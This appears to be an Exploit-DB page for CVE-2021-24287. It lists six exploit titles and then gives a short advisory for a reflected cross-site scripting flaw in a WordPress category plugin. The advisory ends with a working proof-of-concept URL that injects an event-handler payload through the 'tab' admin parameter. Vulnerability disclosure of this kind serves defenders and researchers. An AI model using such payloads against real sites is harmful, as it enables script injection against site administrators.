68d01808ce
6 changes to exploits/shellcodes Mitrastar GPT-2541GNAC-N1 - Privilege escalation Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS) Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
13 lines
No EOL
571 B
Text
13 lines
No EOL
571 B
Text
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 2/15/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
|
|
# Version: 1.3.1
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2021-24287
|
|
|
|
1. Description:
|
|
The tab parameter in the Admin Panel is vulnerable to XSS.
|
|
|
|
2. Proof of Concept:
|
|
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); |